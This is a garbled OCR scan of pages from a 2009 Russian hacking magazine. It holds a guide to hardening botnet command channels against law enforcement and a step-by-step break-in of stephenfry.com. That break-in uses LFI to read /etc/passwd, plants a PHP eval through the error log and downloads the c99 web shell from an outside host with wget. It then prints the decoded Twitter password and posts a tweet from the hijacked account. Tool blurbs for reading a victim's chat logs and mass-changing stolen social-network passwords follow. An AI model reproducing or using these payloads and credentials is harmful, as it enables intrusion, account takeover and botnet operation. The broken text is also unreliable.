книги хакеры / журнал хакер / 128_Optimized
.pdf
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
Controlling |
|
Server |
Bot Infection |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
>> взломw Click |
|
BUY |
|
|
||||||
to |
|
|
|
|
m |
|||||
|
|
|
|
|
||||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
IN RESPONSE TO THE COMMANDS FROM
A MALICIOUS USER, CONCURRENT ATTACKS
TO TARGETING SITE BEGIN
УВИДЕТЬ, КАКРАСПРОСТРАНЕНБОТНЕТ, ЛУЧШЕВСЕГО НА КАРТЕ
ПРОГРАММАДЛЯДЕМОНСТРАЦИИ ПРОЦЕССАRSA-ШИФРОВАНИЯ
СХЕМАШИФРОВАНИЯСПОМОЩЬЮRSA
разделиться: 3001
Мыполучилиотличнуюмасштабируемость,да ктомуже,какпобочныйпродуктможемдавать разныекомандыразнымучасткам,чтоиногда полезно.
ЗАЩИТАКОМАНД
НедавновСетипроскакивалановостьотом,что какие-тоученыеполучилидоступкботнетуна несколькоднейичто-тотаманализировали.Нам этовообщененужно.Асейчасэтоделаетсяочень просто,ведьфедералымогут,проанализировав бота,узнатькомандыидомены,гдеботыищуткоманды,адальшепередатьлюбуюкоманду,например,«самоуничтожиться».Каквариантзащиты, можемшифроватьAES-ом,апотомпереводитьв BASE64.Соднойстороны,шифрованиемощное, ноеслиботамогутдизассемблироватьидостать пароль,всенашистаранияпойдутпрахом. Вкачестверешенияестьтехнология,которойамериканскиевластивсвоевремяоченьбоялись.Даже запретилипрогу,нанесколькострочекнаписанную наPerl'е,алюди,выражаяпротест,печаталина футболкахкодэтойпрограммы.Кактыпонял—это историяRSA.СпомощьюRSAможнокакшифровать сообщения,такиподписыватьинформацию,тоесть гарантироватьто,чтоименномыподаликоманду. Этимивоспользуемся.Сгенерируемдваключа: пабликиприват,ивкаждыйботзапишемпаблик- ключ.Априват-ключбудемхранитьусебя.Файлс командамитеперьдолженбытьтаким:
ПРОСТОДЕЛЬНЫЙСОВЕТ
3.00:01 08.07.2009
4.23:59 09.07.2009
5.команда 1
6.команда ...
7.хеш_сгенерированный_приватным_ ключем
Впервойстрочке—случайнаяпоследователь- ность,чтонеобходимадлязащитыотрасшифровкиприватногоключа.Вовторойстрочке размещаетсяслучайносгенерированныйдомен, накоторомнаходитсякоманда—этозащищаетот несанкционированногонамикопированияфайла надругиеучасткиботнета(помнимомасштабируемости).Втретьейичетвертойстрочке— время(промежуток,когдакомандаактуальна)и, собственно,списоккоманд.Последняястрочка, сгенерированнаяприватнымключом,—подпись, котораягарантирует,чтокомандапришлаименно отхозяинаботнета.Когдаботсчитываеткоманду, тосвоимпубличнымключомможетпроверить— соответствуетлитекстподписи,еслида—всеОК, еслинет—игнорироватькоманду.Этотспособ позволяетполностьюзащититьботнетот«врагов».Сейчаснесуществуетспособарасшифровки RSAприключев2048бит.Полностьюдержать командывоткрытомвидетоженевсегдаинтересно.Хотяниктоникакповлиятьнеможет,ноот любознательныхможнозащититься,зашифровав файлспомощьюкакого-тосимметрическогоклю- ча,типаAES. Приразработкеботатакжеследует реализоватькомандупосменепубличногоключа вботе.Этосоздастспособпередачичастиботнета
даватьнедолжен,чтогарантирует,чтомыне заберемботнетназад).Дальшенужноотправить ботам,кпримеру,такуюкоманду:
взять_новый_публичный_ключ: "публичный ключ"
ВОЗВРАТРЕЗУЛЬТАТОВ
Обычноботнетамненужноотсылатьинформациюобратно,нодлянекоторыхэтообязательное условие.Возникаетвопрособезопаснойпередаче. Разбототдаетсписокпаролей,—неоченьприятно, еслифедералы,захвативдоступксерверу,потом заблокируютакки,которыеботыстарательнособирали.Длярешенияпроблемывозьмемлюбимый RSA.Онпозволяетспомощьюпубличногоключа зашифроватьсообщения.Расшифроватьсможем лишьмы,снашимсекретнымприватнымключом. Длязаписиинформациинасерверясоветую использоватьPOST-метод.Заранееопределяем имяскрипта,котороебудетприниматьданные (кпримеру,tttt123.php).Аботпослеполучения командыотсылаетшифрованныерезультатына домен,откудаполученакоманда(файлtttt123.php лишьзаписываетфайлнадиск).Далеемыегозабираемксебенакомп,ужетамрасшифровываем приватнымключоми,какводится,анализируем.
АДМИНКА
Вотмыстобоюирассмотрелиархитектуру,котораякажетсяидеальной.Покрайнеймере,яне вижувнейуязвимыхмоментов.Хотяестьминус,
—системасложноватавуправлении.Мноюбыла разработанаудобнаяадминканаPython'e,что автоматизируетрутинууправления.Ксожалению, описаниеужевыходитзарамкистатьи,ноесли тебевсежеинтересноузнатьоееархитектуре— напишимненапочту.
FROM MY СОВЕСТЬ
Каквидишь,дажематематикаиногда(иливсегда) бываетполезна,итовремя,чтотыпотратил(илиеще
вдругиеруки,например,припродаже.Мыможем потратишь)наееизучение,никогданебудетлиш-
1.случайная_последовательность попроситьпокупателясгенерироватьпубличный ним.Еслипоявилисьвопросы,илибылинеочень
2. tutamc.com |
ключ—идатьнам(априватныйключпокупатель |
понятныеместавстатье—обращайся. z |
XÀÊÅÐ 08 /128/ 09 |
059 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
|
|
P |
|
|
|
|
|
NOW! |
o |
|
||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
>>m |
|
|||
w Click |
to |
|
|
|
взлом |
|||||
|
|
|
|
|||||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
МАГ ЗВЕЗДНЫЙ
/ ICQ 884888, HTTP://WAP-CHAT.RU /
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
ВЗЛОМTWITTER-АККАУНТАСТИВЕНАФРАЯ
Влентахновостейзачастуюможнопрочестьотом, чтовочередной разнаТвиттеревзломанаккаунткакой-нибудьБритниСпирс, ДжонаМакКейнаиижесними. Какправило, такиевзломынесоставляют большоготрудаипроводятсяспомощьюгрубойсилы— брутфорса (звездылюбятставитьпростейшиепароли). Нобрутфорс— ненаш метод. Напримеребританскогокомика, звездыфильмов«Автостопом погалактике» и«V — значитвендетта» СтивенаФраяяподробнорасскажуотом, какбыстроилегкопоиметьмикроблогизвестной личности.
МИКРОБЛОГГИНГ
Начнемстого, чтоофициальныйсайт актерарасполагаетсяпоадресуhttp://www. stephenfry.com ипредставляетсобойсобраниепостовизегоблогаифорума, скопище рекламныхбаннеровинекотороеколичество промо-трейлеров, рекламирующихпроизведенияФрая. Такженасайтеможноувидеть твитыактера— stephenfry.com/clubfry/twitter.
АтаккакТвиттерпредоставляетсвойAPI любомужелающему, тозакралосьподозрение, чтогде-товконфигахсайтахранитсяипароль кмикроблогу:). Собственно, нашейконечной цельюбудетполныйконтрольнадtwitter-
аккаунтомактера(twitter.com/stephenfry), на данныймоментимеющем644,489(!) фолловеров.
ПОИСКБАГОВ
Первымделомосмотримсайтнапредмет пабликдвижков. Изтаковыхприсутствуют мойлюбимыйблоговыйдвижокWordPress и печальноизвестныйфорумphpBB. Открыв исходникглавнойстраницыблога(stephenfry. com/blog), можнонаблюдатьследующее:
<meta name="generator" content="WordPress 2.5.1" />
Ксожалению, для2.5.1 версиивордпрессау менявтотмоментнебылоподрукойнеобходимыхэксплойтов, ипришлосьотброситьэтот вариант.
Далеенеобходимоузнатьверсиюфорума phpBB. Сделатьэтоможномногимиспособами, носамыйудобный— переходпо ссылкесисториейверсийдвижкаstephenfry. com/forum/docs/CHANGELOG.html. Таккак последнийchange был«Changes since 2.0.20»,
смеломожноделатьвывод, чтоверсияфорума находитсядалекозапределамипо-настояще- муюзабельныхуязвимостей(если, конечно, не считатьтаковымивсяческиеXSS иCSRF баги). НеиспытываябольшогожеланияиспользоватьизвестныеXSS дляэтойверсииphpBB, я отправилсязасоветомквеликомуимогучему Гуглустакимзапросом:
site:stephenfry.com filetype:php
Наэтотнехитрыйзапроспоисковиквыдал
кучуссылокнаPHP-файлы, которыенаходилисьнасайтеактера. Менясразужезаинте-
ресовалассылкаstephenfry.com/section.php? section=clubfry&subsection=twitter.
Здесьналицодваварианта: либообращение кбазеданныхссоответствующимипараметрами, либоинклудфайловшаблонов.
Решивсразупроверитьвторойвариант, я составилзапрос:
stephenfry.com/section.php?section =clubfry&subsection=/../../../../.
./../../../../../../../../../../.. /etc/passwd%00
Начтодвижоксайтарадостновыдалсодержимое/etc/passwd :). Уязвимостьлокального инклудасработающимнулл-байтомбыла найдена! Делооставалосьзамалым— найти, вкакойфайлзапихнутьзлонамеренныйкод.
УСЛУЖЛИВЫЕЛОГИ
Еслитычиталмоюстатьювпрошломномереz, тодолжензнатьозамечательныхспособах инжектасвоегокодачерезразличныесимво-
060 |
XÀÊÅÐ 08 /128/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
ШЕЛЛНАSTEPHENFRY.COM
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
>> взломw Click |
|
BUY |
|
|
||||||
to |
|
|
|
|
m |
|||||
|
|
|
|
|
||||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
КОНФИГSTEPHENFRY.COM
лическиессылки, находящиесяв/proc/self/*. Попробуемзаюзатьхранилищелокальных переменных/proc/self/environ:
stephenfry.com/section.php?section =clubfry&subsection=/../../../../.
./../../../../../../../../../../.. /proc/self/environ%00
Ксожалению, /proc/self/environ оказалсядля наснедоступен:(.
Теперь настал черед попробовать проинклудить логи. Путем нехитрого подбора выяснилось, что апачевский error_log находится в /proc/self/fd/2 (будем юзать именно его, так как access_log для такого сайта наверняка будет размером в пару-тройку гигабайт, которые окажутся неподвластными для LFI).
Зачастуювerror_log записываетсябез всякойфильтрациипеременнаяreferer, в которуюкакразтакииможнопроинжектить нашPHP-код. Осталосьтольковызватьошибку, котораяизапишетсявлог. Самойлегко выполнимойявляетсяошибкаследующего формата:
[Sat Jul 11 23:39:21 2009] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /
Чтобывызватьтакуюошибкуизаписатьнаш evil-код, достаточнолишьпослатькнужному хостухэдерспустымзаголовкомHost. Сделатьэтоможно, например, так:
z:/usr/local/bin/curl.exe "http:// www.stephenfry.com/" -H "Host:" --referer "<?php eval($_GET[cmd]); ?>"
Витоге, нашкодуспешнозапишетсяв error_log:
[Sat Jul 11 23:39:21 2009] [error] [client x.x.x.x] client sent HTTP/1.1 request without hostname (see RFC2616 section 14.23): /, referer: <?php eval($_GET[cmd]); ?>
XÀÊÅÐ 08 /128/ 09 |
061 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
|
|
P |
|
|
|
|
|
NOW! |
o |
|
||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
>>m |
|
|||
w Click |
to |
|
|
|
взлом |
|||||
|
|
|
|
|||||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
РЕЗУЛЬТАТОТСЫЛКИПУСТОГОЗАГОЛОВКАHOST
HTTP://WWW
links
•www.stephenfry. com — виновник торжества.
•ru.wikipedia.org/ wiki/Стивен_Фрай
— об актерена Википедии.
•twitter.com/ stephenfry — микроб-
логСтивенаФраяна
Твиттере.
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
|
|
|
|
МОЕПОСЛАНИЕНАТВИТТЕРЕОТИМЕНИФРАЯ |
|||
|
INFO |
|
|
– имысможемвыполнятьлюбыекомандыпоследующей |
|
||
|
|
|
|
|
|||
|
info |
$aryBlogEntry = fnGetHomepageBlogArray(); |
|||||
|
ссылке: |
$aryBlogStats = fnGetBlogStatsArray(); |
|||||
СтивенДжонФрай |
|
|
$aryForumStats = fnGetForumStatsArray(); |
||||
(Stephen John |
http://www.stephenfry.com/section.php?sec |
|
$strSection = ""; |
||||
Fry) — английский |
tion=clubfry&subsection=/../../../../../.. |
|
$strSubSection = ""; |
||||
писатель, актер |
/../../../../../../../../../../proc/self/ |
|
include(SF_BASE_DIR."/templates/ |
||||
идраматург,славуко- |
fd/2%00&cmd=phpinfo(); |
|
navigation/header.php"); |
||||
торомупринеслироли |
|
|
... |
||||
ПРОНИКНОВЕНИЕ |
|||||||
вкомедийныхтеле- |
?> |
||||||
сериалах(«Чёрная |
Придальнейшихраскопкахииспользованиикомандыfind |
|
|||||
|
|||||||
Гадюка»,«ШоуФрая |
./ -type d -perm 0777 -ls выяснилось, чтонасерверепри- |
Далее— lib/sf_main.php: |
|||||
иЛори»и«Дживси |
сутствуютнесколькодиректорий, доступныхдлязаписи. Я |
|
|||||
Вустер»).Запредела- |
выбрал/home/fry/public_html/img/blog_thumbs/ изалил |
<?php |
|||||
миВеликобритании |
тудаC99madShell подименемblog.php спомощьюwget: |
include_once "sf_constants.php"; |
|||||
Фрайизвестен |
|
|
include_once "sf_db_class.php"; |
||||
восновномпороли |
http://www.stephenfry.com/section.php?sec |
|
include_once "sf_template.php"; |
||||
ОскараУайльда |
tion=clubfry&subsection=/../../../../../.. |
|
include_once "sf_cache_functions.php"; |
||||
вфильме«Уайльд» |
/../../../../../../../../../../proc/self/ |
|
... |
||||
(1997). Помимо |
fd/2%00&cmd=system('wget -O /home/fry/public_ |
|
?> |
||||
написаниясцена- |
html/img/blog_thumbs/blog.php http://madnet. |
|
|
||||
|
|
||||||
риевитекстовдля |
name/files/download/9_c99madshell.php'); |
|
И, наконец, lib/sf_constants.php: |
||||
телевидения, ра- |
|
|
|
||||
|
|
|
|||||
дио, киноитеатров, |
Остаетсясамоеглавное— найтидоступыкобожаемому |
<?php |
|||||
Фрайвыступает |
ФраемТвиттеру. Аначнеммыпоискспросмотраисходни- |
... |
|||||
авторомстатей |
ка/home/fry/public_html/index.php: |
||||||
иведущимколонок |
|
|
|
||||
внесколькихгазе- |
<?php |
|
define('SF_TWITTER_USER','stephenfry'); |
||||
тахижурналах. |
include_once("lib/sf_main.php"); |
|
define('SF_TWITTER_PASSWORD','dzQxbGE4eW9uMz |
||||
|
|
|
|
|
|
|
062 |
XÀÊÅÐ 08 /128/ 09 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
to |
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|||||
w |
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-xcha |
|
|
|
|
>>
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
X |
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
||
|
F |
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
r |
||
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
||||
|
|
|
|
|
BUY |
|
|
|||
взломw |
|
|
to |
|
|
|
|
|
||
w Click |
|
|
|
|
|
|
||||
|
|
|
|
|
o |
m |
||||
|
w |
|
|
|
|
|
|
|
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
-x cha |
|
|
|
|
ТВИТЫ, ВСТРОЕННЫЕПРЯМОВСАЙТАКТЕРА
d3bzQ=');
...
?>
Каквидно, переменнаяSF_TWITTER_PASSWORD зашифрованав base64, такчтонадолишьпропуститьэтозначениечерезфункцию base64_decode иполучитьитоговыйпарольw41la8yon37wo4.
Конечнаяцельпочтидостигнута! Парольполучен(атакойпассворд врядливозможноподобратьспомощьюгрубойсилы). Осталосьзайти вактерскийаккаунтнаtwitter.com иоставитьтамсвоепосланиедля будущихпоколений.
ТВИТТЕР
Ну-с, заходимнаtwitter.com, вбиваемвсоответствующиеполялогин stephenfry ипарольw41la8yon37wo4 иоказываемсязалогиненнымиподаккаунтомФрая:). Послелогинасервисзадаетнампростой вопрос«What are you doing?», накоторыймысрадостьюотвечаем«I’ll be watching you! From Russia with love :)» (результатэтогонехитрого действиятыможешьвидетьнаскриншоте). ВтечениенесколькихминутпослеотправкимоегосообщенияфанатыСтивенаначалипостить своиответы:
RegNomSongs by The Police and Matt Monroe. This is a quiz, right? RT @stephenfry: I’ll be watching you! From Russia with love :)
---
lokimaros@stephenfry How about how Дмитрий Дмитриевич Шостакович radically changed your life and listening habits.
---
NikkiG57@stephenfry tell them about Russia, Wagner and your performance at Glastonbury
---
valpanna@stephenfry I am afraid, very afraid!
---
Benn2100@stephenfry I’ll be watching you too
---
thisheartbeatz@stephenfry have fun in RUSSIA! B)
---
wrathofagony@stephenfry cool in Russia? how is it???
---
CybrHwk@stephenfry Your in Russia? Where about in Russia are you Stephen?
---
chriscattaneoRT @stephenfry: I’ll be watching you! From Russia with love :) ok James!
---
Betty_Bitch@stephenfry and i’ll be watching you on dave, from Wales with love :)
---
sjoes@stephenfry Are you in still Russia?
---
mio@stephenfry wow o_0 where are you now, Stephen?
Похоже, никтонедогадался, чтоаккаунтактеравзломан, афраза «From Russia with love» вовсенеозначает, чтоФрайсейчаснаходится вРоссии.
НЕХИЛЫЙФЛЕШМОБ
Завладеваккаунтомизвестнойличностинакаком-нибудьпопулярном онлайновомсервисе, можноустроитьнетольконехилыйфлешмоб, но иполноценнуюскам/фишинг/спаматаку. Но, конечно, самымзабавнымвтакойситуациибылонедавнеесообщениенаТвиттереБритни Спирсоеесмерти:).
P.S. Спустяпаруминутяудалилсвойпостизмикроблога, ибомоя тонкаядушевнаяорганизациянепозволяеттравмироватьогромную армиюпоклонниковСтивенаФрая. z
ИНКЛУД/ETC/PASSWD
WARNING |
warning
Всеописанноевстатье являетсяплодомбольноговоображенияавтора.Любыесовпаденияссуществующими сайтамислучайны.Ни редакция,ниавторне несутответственности залюбойвозможный вред,причиненный материаламиэтой статьи.
XÀÊÅÐ 08 /128/ 09 |
063 |
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|
|||
|
|
X |
|
|
|
|
|
|
|||
|
- |
|
|
|
|
|
d |
|
|||
|
F |
|
|
|
|
|
|
|
t |
|
|
|
D |
|
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
|
|
P |
|
|
|
|
|
NOW! |
o |
|
|||
|
|
|
|
|
|
|
|||||
|
|
|
|
|
BUY |
>>m |
|
||||
w Click |
to |
|
|
|
|
взлом |
|||||
|
|
|
|
|
|||||||
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
|
o |
|
|
. |
|
|
|
|
|
|
.c |
|
||
|
|
p |
|
|
|
|
g |
|
|
||
|
|
|
df |
|
|
n |
e |
|
|||
|
|
|
|
-xcha |
|
|
ЛЕОНИД «R0ID» СТРОЙКОВ |
||||
|
|
|
|
|
|
|
|
|
/ R0ID@BK.RU /
|
Программы для хакеров |
|
ПРОГРАММА:MAIL.RUHISTORYREADER |
взлом |
ОС:WINDOWS2000/XP |
АВТОР:GAR|K |
|
>> |
|
Читаемхисториперепискиизмэил-агента
РазличныеIM-клиентывпоследнеевремя расплодилисьвогромномколичестве. Причина
— растущаяпопулярностьонлайновыхсистем обменамгновеннымисообщениями. Вкачестве примераможнопривестиmail-агентотMail.ru, набравшийнемаленькуюаудиториююзеров.
Мессенджерполучился действительноудобный ифункциональный, носоднимнедостатком— чу- жуюисториюперепискивнемпочитатьнетак-то просто. Аведьиногдадоступкхисторинеобходим, особенно, еслионаслитаскомпатвоейдевушки:). Однакорешениеесть, иимяему— Mail.ru History Reader. Тулзапредназначенадлядешиф- ровкилоговmail-агентаиприведенияистории перепискивудобочитаемыйвид. Использовать утилудовольнопросто:
1.Сливаем интересующие нас логи переписки с компа жертвы, вида: blabla@ mail.ruhistory.txt
2.Копируем софтинку с нашего DVD себе на винт и запускаем через консоль
3.Указываем history-файл и файл для сохранения результата:
C:\conv.exe blabla@mail.ruhistory. txt blabla@mail.ru.txt
4.Получаем файлик blabla@mail.u.txt, в котором и лежит расшифрованная история переписки :)
Тулзаработаетслогамиmail-агента<= 5.3- версии, такчтолибовсяческиагитируйавтора
— товарищаGar|k'а— надальнейшееразвитие утилы, либоотговаривайсвоюдевушкуобновлять mail-агент. Сорцыутилытынайдешьнанашем диске.
ПРОГРАММА:ODNOKLASSNIKI.RU
PASSWORDCHANGER&ACCOUNT CHECKER
ОС:WINDOWS2000/XP АВТОР:ZDEZBILYA
ВпрошлыхвыпускахХ-Тулзяпубликовал несколькоинтересныхутил, облегчающихвсестороннююработуспопулярнымисоциальными сетями. Небудемнарушатьтрадициюисразу
|
|
|
|
|
hang |
e |
|
|
|
|
|
|
|
|
|
C |
|
E |
|
|
|||
|
|
|
X |
|
|
|
|
|
|||
|
|
- |
|
|
|
|
|
d |
|
||
|
|
F |
|
|
|
|
|
|
t |
|
|
|
|
D |
|
|
|
|
|
|
|
i |
|
|
|
|
|
|
|
|
|
|
r |
||
|
P |
|
|
|
|
|
NOW! |
o |
|||
|
|
|
|
|
|
|
|
||||
|
|
|
|
|
|
BUY |
|
|
|||
|
|
|
|
|
to |
|
|
|
|
|
|
|
w Click |
|
|
|
|
|
m |
||||
|
|
|
|
|
|
|
|||||
|
w |
|
|
|
|
|
|
|
|
|
|
|
|
w |
|
|
|
|
|
|
|
o |
|
|
|
. |
|
|
|
|
|
.c |
|
||
|
|
|
p |
|
|
|
|
g |
|
|
|
|
|
|
|
df |
|
|
n |
e |
|
||
|
|
|
|
|
-x cha |
|
|
|
|
||
перейдемкописаниюполезногософта, который |
|
|
|
|
|
|
|
|
|
|
|
наэтотразпредназначенисключительнодля |
|
|
|
|
|
|
|
|
|
|
|
ресурсаodnoklassniki.ru ивключаетвсебядве |
|
|
|
|
|
|
|
|
|
|
|
утилы: Odnoklassniki.ru Password Changer и |
|
|
|
|
|
|
|
|
|
|
|
Odnoklassniki.ru Account Checker. Каквидноиз |
|
|
|
|
|
|
|
|
|
|
|
названий, прогипозволяютчекатьаккаунтыи |
|
|
|
|
|
|
|
|
|
|
|
менятьнанихпароливавтоматическомрежиме. |
|
|
|
|
|
|
|
|
|
|
|
Начнемсченджерапассовaka утилыдлямассо- |
|
|
|
|
|
|
|
|
|
|
|
войсменыпаролейнааккахв«Одноклассниках». |
|
|
|
|
|
|
|
|
|
|
|
Тулзапозволяет: |
|
|
|
|
|
|
|
|
|
|
|
• менять пароли на аккаунтах на один |
|
|
|
|
|
|
|
|
|
|
|
заданный пасс |
|
|
|
|
|
|
|
|
|
|
|
• менять пароли на аккаунтах на гене- |
|
|
|
|
|
|
|
|
|
|
|
ренные пассы |
|
|
|
|
|
|
|
|
|
|
|
Всеаккаунтыдолжныхранитьсявфайле |
|
|
|
|
|
|
|
|
|
|
|
accounts.txt, видзаписей: логин;пароль. В |
|
|
|
|
|
|
|
|
|
|
|
процессеработыутилаиспользуетнесколько |
|
|
|
|
|
|
|
|
|
|
|
файлов: |
|
|
|
|
|
|
|
|
|
|
|
good_acc.txt — файл, в который по- |
|
|
|
|
|
|
|
|
|
|
|
мещаются все успешно смененные пары |
|
|
|
|
|
|
|
|
|
|
|
логин;новый_пароль |
Массовоменяемпаролинаакках |
|
|
|
|
|
|
|
|
|
|
bad_acc.txt — файл, в который поме- |
в«Одноклассниках» |
|
|
|
|
|
|
|
|
|
|
щаются все неудачно смененные пары |
|
|
|
|
|
|
|
|
|
|
|
логин;старый_пароль |
ются все невалидные аккаунты |
|
|
|
|
|
|
|
|
|
|
error_acc.txt — файл, куда помещаются |
error_acc.txt — файл, в который поме- |
|
|
|
|
|
|
|
|
|
|
аккаунты, в процессе обработки кото- |
щаются аккаунты, в процессе обработ- |
|
|
|
|
|
|
|
|
|
|
рых возникли непредвиденные ошибки |
ки которых возникли непредвиденные |
|
|
|
|
|
|
|
|
|
|
|
ошибки |
|
|
|
|
|
|
|
|
|
|
Извозможныхпричин, покоторымаккаунты |
|
|
|
|
|
|
|
|
|
|
|
помещаютсявbad_acc.txt, следуетвыделить: |
Отсебядобавлю, чтообеутилыдовольноудобны |
|
|
|
|
|
|
|
|
|
|
|
ивполнеработоспособны. Причем, каждаяиз |
|
|
|
|
|
|
|
|
|
|
• неверный старый пароль |
тулзявляетсяполноценнымwin32-приложением, |
|
|
|
|
|
|
|
|
||
• не подходит новый пароль (не соот- |
